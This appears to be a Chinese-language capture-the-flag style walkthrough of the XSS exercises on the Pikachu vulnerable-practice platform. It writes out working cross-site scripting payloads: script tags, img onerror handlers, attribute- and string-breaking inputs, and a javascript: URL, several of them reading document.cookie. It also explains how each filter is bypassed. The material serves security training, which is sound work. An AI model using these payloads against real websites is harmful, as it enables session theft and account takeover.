Pikachu漏洞平台---XSS(Cross-Site Scr

Pikachu Vul

XSS

1.反射型XSS(get)
随便输入，可以发现没有任何过滤，只是限制了输入字符的长度，F12修改一下即可

2.反射型XSS(post)
可以看到是一个用户登陆窗口，username和pwd都不知道，看看提示：

为了能够让你练习xss获取cookie,我们还是登陆一下,账号admin/123456
登上去以后发现还是没有任何过滤，直接构造payload:

<script>alert(document.cookie)</script>

3.存储型xss
没过滤，直接搞

4.DOM型XSS
初步观察，点击 click me! 后会出现 what do you see? 的链接按钮，其指向是 当前目录/you_input 审查元素时发现onclick后会执行函数 domxss() ,其作用是读取input的值并将其拼接到新创建的link节点中，源码如下：

                    function domxss(){
                        var str = document.getElementById("text").value;
                        document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
                    }
                    //试试：'><img src="#" onmouseover="alert('xss')">
                    //试试：' onclick="alert('xss')">,闭合掉就行

5.DOM型xss-s
和4同理，直接搞

6.xss之盲打
没有任何过滤，提交以后访问 /admin.php 用户名admin，密码123456，打开就弹窗。。。

7.xss之过滤
说是有过滤，随便输测试一下:

<h1>im a lil horny.</h1>

成功了，
试试

<script>alert(/xss/)</script>

可以看到被过滤了，换个轮子：

<img src=0 onerror="alert(document.cookie)">

成功弹窗了...看下过滤语句：

$message=preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/', '', $_GET['message']); //使用正则将 <script 替换为空

8.xss之htmlspecialchars
审查元素后发现输入的内容是被拼接在<a href ="输入的内容">中
故构造:

"><img src=0 onerror="alert(/xss/)">

没有作用，经过了过滤。
看下源码：

$message=htmlspecialchars($_GET['message'])

这里就要说htmlspecialchars这个函数的作用了：

htmlspecialchars(string,flags,character-set,double_encode)

该函数把预定义的字符转换为 HTML 实体
预定义的字符是 & " ' < > 这五个，即转化为 &#xxx的形式
关于flags：默认情况下为只过滤双引号，若设置为ENT_QUOTES则单双引号均被过滤
明白了htmlspecial的作用，可以看到本题中未过滤单引号，故输入 'gggg'gggg'
返回的DOM为

<a href="" ggg'ggg''="">'ggg'ggg'</a>     
<!--可以看到最前面的'被当作"闭合了href属性，语句中和语句后的单引号没有受到影响-->
<!--后来才知道输入的单引号没有被过滤的话，经过htmlspecialchars后拼接到html语句中会自动换成双引号-->

现在可以开始造轮子：

' onclick='alert(document.cookie)'

成功弹出Cookie，再次审查元素拼接我们输入之后的HTML：

<a href="" onclick="alert(document.cookie)" '="">' onclick='alert(document.cookie)'</a>

9.xss之href输出
测试：

' onclick='alert(/xss/)'

审查返回的元素发现所有字符都被转化为HTML实体了，包括单引号。
但由于输入的url拼接在 <a href='输入的内容'>属性中，可以使用javascript语法来造轮子：

Javascript:alert(document.cookie)

如果没有限制的话可以用来执行远程JS

10.xss之js输出
测试输入 <123> 审查元素可以发现如下代码：

<script>
    $ms='<123>';
    if($ms.length != 0){
        if($ms == 'tmac'){
            $('#fromjs').text('tmac确实厉害,看那小眼神..')
        }else {
//            alert($ms);
            $('#fromjs').text('无论如何不要放弃心中所爱..')
        }

    }
</script>

输入被拼接到了脚本中，尝试闭合语句然后添加自己的语句上去：

';alert(document.cookie)//

成功弹出cookie

这里将输入动态的生成到了js中,形成xss,javascript里面是不会对tag和字符实体进行解释的.